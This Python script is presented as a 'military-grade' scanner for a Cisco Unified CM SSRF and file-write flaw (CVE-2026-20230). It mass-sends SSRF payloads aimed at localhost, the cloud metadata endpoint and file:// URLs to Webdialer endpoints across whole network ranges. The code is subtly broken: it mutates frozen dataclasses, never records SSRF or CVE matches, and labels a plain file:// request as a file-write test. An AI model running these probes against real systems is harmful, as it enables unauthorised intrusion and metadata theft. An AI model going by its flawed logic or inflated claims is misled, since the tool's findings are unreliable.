#!/usr/bin/env python3
"""
CVE-2026-20230 — Cisco Unified CM SSRF + File Write Vulnerability Scanner
Military-grade async reconnaissance scanner.

Author: Advanced Persistent Security Research
"""

from __future__ import annotations

import argparse
import asyncio
import ipaddress
import json
import re
import socket
import sys
import time
from collections.abc import Sequence
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass, field, asdict
from datetime import datetime, timezone
from enum import IntEnum, auto
from pathlib import Path
from typing import Any
from urllib.parse import urljoin, urlparse

import aiohttp
from colorama import Fore, Style, init

init(autoreset=True)


# ---------------------------------------------------------------------------
# Constants & Configuration
# ---------------------------------------------------------------------------

DEFAULT_TIMEOUT = 12
CONCURRENCY = 80
WEB_PORT = 8443
WEB_SSL_PORT = 8443

# Cisco Unified CM endpoints
CISCO_ENDPOINTS = [
    "/webdialer/Webdialer",
    "/ucmuser/",
    "/cucim-service/",
    "/console/",
    "/admin/",
    "/xmldirectorylistener/",
]

# SSRF test targets
SSRF_TEST_URLS = [
    "http://127.0.0.1/",
    "http://[::1]/",
    "http://169.254.169.254/latest/meta-data/",
    "http://localhost:22/",
    "http://localhost:9200/",
]

# File write test patterns
FILE_WRITE_TEST = "SSRF_TEST_FILE"

class Color:
    OKGREEN = Fore.GREEN + Style.BRIGHT
    OKBLUE = Fore.BLUE + Style.BRIGHT
    OKCYAN = Fore.CYAN + Style.BRIGHT
    OKMAGENTA = Fore.MAGENTA + Style.BRIGHT
    WARNING = Fore.YELLOW + Style.BRIGHT
    FAIL = Fore.RED + Style.BRIGHT
    RESET = Style.RESET_ALL
    BOLD = Style.BRIGHT


class VulnStatus(IntEnum):
    VULNERABLE = auto()
    LIKELY = auto()
    POSSIBLE = auto()
    NOT_VULNERABLE = auto()
    UNKNOWN = auto()


@dataclass(frozen=True, slots=True)
class ServiceProbe:
    port: int
    protocol: str
    status: str
    banner: str = ""
    response_time_ms: float = 0.0
    vuln_indicators: dict[str, Any] = field(default_factory=dict)


@dataclass(frozen=True, slots=True)
class HostResult:
    target: str
    ip: str
    hostname: str = ""
    status: VulnStatus = VulnStatus.UNKNOWN
    confidence: int = 0
    findings: list[str] = field(default_factory=list)
    services: list[ServiceProbe] = field(default_factory=list)
    cve_matches: dict[str, bool] = field(default_factory=dict)
    recommendations: list[str] = field(default_factory=list)

    def to_dict(self) -> dict[str, Any]:
        return {
            "target": self.target,
            "ip": self.ip,
            "hostname": self.hostname,
            "status": self.status.name,
            "confidence": self.confidence,
            "findings": self.findings,
            "services": [asdict(s) for s in self.services],
            "cve_matches": self.cve_matches,
            "recommendations": self.recommendations,
        }


# ---------------------------------------------------------------------------
# Async Probing Engine
# ---------------------------------------------------------------------------

class AsyncProber:
    def __init__(self, timeout: int = DEFAULT_TIMEOUT):
        self.timeout = aiohttp.ClientTimeout(total=timeout, connect=5)
        self._session: aiohttp.ClientSession | None = None

    async def __aenter__(self) -> "AsyncProber":
        conn = aiohttp.TCPConnector(
            limit=CONCURRENCY,
            limit_per_host=CONCURRENCY // 2,
            ssl=False,
            enable_cleanup_closed=True,
        )
        self._session = aiohttp.ClientSession(connector=conn, timeout=self.timeout)
        return self

    async def __aexit__(self, *args: object) -> None:
        if self._session:
            await self._session.close()

    async def probe_https(self, ip: str, port: int, path: str = "/", method: str = "GET",
                         data: dict | None = None) -> ServiceProbe:
        start = time.perf_counter()
        url = f"https://{ip}:{port}{path}"
        try:
            assert self._session is not None
            if method == "POST":
                async with self._session.post(url, data=data, ssl=False, allow_redirects=True) as resp:
                    body = await resp.text()
                    elapsed = (time.perf_counter() - start) * 1000
                    return ServiceProbe(
                        port=port, protocol="https", status=str(resp.status),
                        banner=f"{resp.status} {len(body)} bytes",
                        response_time_ms=elapsed,
                    )
            else:
                async with self._session.get(url, ssl=False, allow_redirects=True) as resp:
                    body = await resp.text()
                    elapsed = (time.perf_counter() - start) * 1000
                    return ServiceProbe(
                        port=port, protocol="https", status=str(resp.status),
                        banner=f"{resp.status} {len(body)} bytes",
                        response_time_ms=elapsed,
                    )
        except Exception as exc:
            elapsed = (time.perf_counter() - start) * 1000
            return ServiceProbe(port=port, protocol="https", status="error",
                                banner=str(exc), response_time_ms=elapsed)

    async def test_ssrf(self, ip: str, port: int, path: str, target_url: str) -> dict[str, Any]:
        """Test SSRF via webdialer endpoint."""
        result: dict[str, Any] = {"vulnerable": False, "response": "", "status": 0}
        url = f"https://{ip}:{port}{path}"
        data = {
            "destination": target_url,
            "url": target_url,
            "action": "doSomething",
        }
        try:
            assert self._session is not None
            async with self._session.post(url, data=data, ssl=False,
                                          timeout=aiohttp.ClientTimeout(total=8)) as resp:
                body = await resp.text()
                result["status"] = resp.status
                result["response"] = body[:500]
                if resp.status == 200 and body:
                    result["vulnerable"] = True
        except Exception as exc:
            result["response"] = str(exc)
        return result

    async def test_file_write(self, ip: str, port: int, path: str) -> dict[str, Any]:
        """Test file write via SSRF chain."""
        result: dict[str, Any] = {"vulnerable": False, "details": ""}
        # Try to write a test file via file:// URL
        test_url = f"file:///tmp/{FILE_WRITE_TEST}"
        ssrf_result = await self.test_ssrf(ip, port, path, test_url)
        if ssrf_result["vulnerable"]:
            result["vulnerable"] = True
            result["details"] = "File write via file:// SSRF possible"
        return result


# ---------------------------------------------------------------------------
# Vulnerability Assessment
# ---------------------------------------------------------------------------

def assess_cisco_vulns(result: HostResult) -> tuple[VulnStatus, int, dict[str, bool]]:
    score = 0
    findings: list[str] = []
    cve_matches = {"CVE-2026-20230": False}

    for svc in result.services:
        banner_lower = svc.banner.lower()
        vuln_indicators = svc.vuln_indicators

        # Cisco device fingerprint
        if "cisco" in banner_lower or "ucm" in banner_lower or "callmanager" in banner_lower:
            score += 15
            findings.append(f"Cisco Unified CM identified: {svc.banner[:100]}")

        # SSRF confirmation
        if vuln_indicators.get("ssrf_vulnerable"):
            score += 30
            findings.append(f"SSRF confirmed: {vuln_indicators.get('ssrf_target', 'unknown')}")

        # File write confirmation
        if vuln_indicators.get("file_write_vulnerable"):
            score += 25
            findings.append("File write via SSRF confirmed")

        # Webdialer endpoint presence
        if "webdialer" in svc.banner.lower() or "webdialer" in svc.status:
            score += 10
            findings.append("Cisco Webdialer service detected")

    # Determine overall status
    if score >= 70:
        return VulnStatus.VULNERABLE, min(score, 100), cve_matches
    elif score >= 40:
        return VulnStatus.LIKELY, min(score, 100), cve_matches
    elif score >= 20:
        return VulnStatus.POSSIBLE, min(score, 100), cve_matches
    elif score > 0:
        return VulnStatus.NOT_VULNERABLE, score, cve_matches
    return VulnStatus.UNKNOWN, score, cve_matches


# ---------------------------------------------------------------------------
# Host Analysis Pipeline
# ---------------------------------------------------------------------------

async def analyze_host(prober: AsyncProber, ip: str) -> HostResult:
    services: list[ServiceProbe] = []

    # Probe Cisco CUCM web interface
    for endpoint in CISCO_ENDPOINTS[:4]:  # Limit to key endpoints
        probe_result = await prober.probe_https(ip, WEB_SSL_PORT, endpoint)
        services.append(probe_result)

    # Test SSRF if Webdialer found
    vuln_indicators: dict[str, Any] = {}
    for svc in services:
        if "webdialer" in svc.banner.lower() or svc.status == "200":
            for test_url in SSRF_TEST_URLS[:3]:  # Test first 3 SSRF targets
                ssrf_result = await prober.test_ssrf(ip, WEB_SSL_PORT, "/webdialer/Webdialer", test_url)
                if ssrf_result["vulnerable"]:
                    vuln_indicators["ssrf_vulnerable"] = True
                    vuln_indicators["ssrf_target"] = test_url
                    vuln_indicators["ssrf_response"] = ssrf_result["response"][:200]
                    break

            # Test file write if SSRF confirmed
            if vuln_indicators.get("ssrf_vulnerable"):
                fw_result = await prober.test_file_write(ip, WEB_SSL_PORT, "/webdialer/Webdialer")
                if fw_result["vulnerable"]:
                    vuln_indicators["file_write_vulnerable"] = True
            break

    # Hostname resolution
    hostname = ""
    try:
        hostname = socket.gethostbyaddr(ip)[0]
    except Exception:
        pass

    result = HostResult(target=ip, ip=ip, hostname=hostname, services=services)
    status, confidence, cve_matches = assess_cisco_vulns(result)
    result.status = status
    result.confidence = confidence
    result.cve_matches = cve_matches
    result.findings = [f for svc in services if svc.status in ("200",) for f in [f"{svc.protocol}/{svc.port}: {svc.banner[:120]}"]]

    # Recommendations
    if status in (VulnStatus.VULNERABLE, VulnStatus.LIKELY):
        result.recommendations.append("IMMEDIATE: Apply Cisco security patch for CVE-2026-20230")
        result.recommendations.append("Restrict CUCM web interface to internal network only")
        result.recommendations.append("Disable Webdialer service if not required")
        result.recommendations.append("Enable TLS certificate validation and strict cipher suites")

    return result


# ---------------------------------------------------------------------------
# CLI / Main
# ---------------------------------------------------------------------------

def print_banner() -> None:
    banner = f"""
{Color.FAIL}
╔══════════════════════════════════════════════════════════════════════════════╗
║  CVE-2026-20230 — Cisco Unified CM SSRF + File Write Scanner                ║
║  Military-Grade Async Reconnaissance & Exploitability Assessment             ║
╚══════════════════════════════════════════════════════════════════════════════╝
{Color.RESET}"""
    print(banner)


def parse_args() -> argparse.Namespace:
    p = argparse.ArgumentParser(
        description="CVE-2026-20230 Cisco Unified CM Scanner",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python scanner.py -n 10.0.0.0/24
  python scanner.py -t 10.0.0.50 -o results.json
  python scanner.py -f targets.txt --threads 200
        """,
    )
    p.add_argument("-n", "--network", help="CIDR network range (e.g. 10.0.0.0/24)")
    p.add_argument("-t", "--target", help="Single target IP")
    p.add_argument("-f", "--file", help="File with target IPs (one per line)")
    p.add_argument("-o", "--output", help="JSON output file")
    p.add_argument("--timeout", type=int, default=DEFAULT_TIMEOUT, help=f"Timeout per probe (default {DEFAULT_TIMEOUT}s)")
    p.add_argument("--threads", type=int, default=CONCURRENCY, help=f"Concurrent probes (default {CONCURRENCY})")
    return p.parse_args()


def load_targets(args: argparse.Namespace) -> list[str]:
    targets: list[str] = []
    if args.target:
        targets.append(args.target)
    if args.file:
        with open(args.file, encoding="utf-8") as fh:
            for line in fh:
                line = line.strip()
                if line and not line.startswith("#"):
                    targets.append(line)
    if args.network:
        try:
            net = ipaddress.ip_network(args.network, strict=False)
            targets.extend([str(h) for h in net.hosts()])
        except ValueError as exc:
            print(f"{Color.FAIL}[!] Invalid CIDR: {exc}{Color.RESET}")
            sys.exit(1)
    return targets


async def main_async() -> None:
    args = parse_args()
    print_banner()

    targets = load_targets(args)
    if not targets:
        print(f"{Color.WARNING}[!] No targets specified. Use -n, -t, or -f.{Color.RESET}")
        sys.exit(1)

    print(f"{Color.OKBLUE}[*] Loaded {len(targets)} target(s){Color.RESET}")
    print(f"{Color.OKBLUE}[*] Timeout: {args.timeout}s | Concurrency: {args.threads}{Color.RESET}")

    results: list[HostResult] = []

    async with AsyncProber(timeout=args.timeout) as prober:
        semaphore = asyncio.Semaphore(args.threads)

        async def bounded_analyze(ip: str) -> HostResult:
            async with semaphore:
                return await analyze_host(prober, ip)

        tasks = [bounded_analyze(t) for t in targets]
        for coro in asyncio.as_completed(tasks):
            result = await coro
            results.append(result)

            status_color = {
                VulnStatus.VULNERABLE: Color.FAIL,
                VulnStatus.LIKELY: Color.WARNING,
                VulnStatus.POSSIBLE: Color.OKCYAN,
                VulnStatus.NOT_VULNERABLE: Color.OKGREEN,
                VulnStatus.UNKNOWN: Color.OKMAGENTA,
            }.get(result.status, Color.RESET)

            print(f"\n{Color.BOLD}Target: {result.ip}{Color.RESET}  Hostname: {result.hostname or 'N/A'}")
            print(f"Status: {status_color}{result.status.name}{Color.RESET} (confidence: {result.confidence}%)")
            for cve, match in result.cve_matches.items():
                if match:
                    print(f"  {Color.FAIL}>>> {cve} CONFIRMED{Color.RESET}")
            for finding in result.findings[:5]:
                print(f"  → {finding}")

    if args.output:
        Path(args.output).write_text(json.dumps([r.to_dict() for r in results], indent=2))
        print(f"\n{Color.OKGREEN}[*] Results written to {args.output}{Color.RESET}")


def main() -> None:
    try:
        asyncio.run(main_async())
    except KeyboardInterrupt:
        print(f"\n{Color.WARNING}[!] Interrupted by user{Color.RESET}")
        sys.exit(130)


if __name__ == "__main__":
    main()
